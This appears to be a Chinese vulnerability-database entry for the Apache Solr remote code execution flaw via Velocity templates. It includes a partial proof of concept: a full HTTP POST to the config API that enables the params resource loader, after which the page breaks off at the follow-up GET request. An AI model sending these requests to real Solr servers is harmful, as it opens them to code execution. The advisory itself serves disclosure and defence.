Apache solr模板注入漏洞

- AV AC AU C I A
发布: 2025-04-13
修订: 2025-04-13

``` Apache Solr RCE via Velocity template Set "params.resource.loader.enabled" as true. Request: ======================================================================== POST /solr/test/config HTTP/1.1 Host: solr:8983 Content-Type: application/json Content-Length: 259 { "update-queryresponsewriter": { "startup": "lazy", "name": "velocity", "class": "solr.VelocityResponseWriter", "template.base.dir": "", "solr.resource.loader.enabled": "true", "params.resource.loader.enabled": "true" } } ======================================================================== RCE via velocity template Request: ======================================================================== GET...

0%

漏洞利用/PoC

暂无可用Exp或PoC

受影响的平台与产品

当前有0条受影响产品信息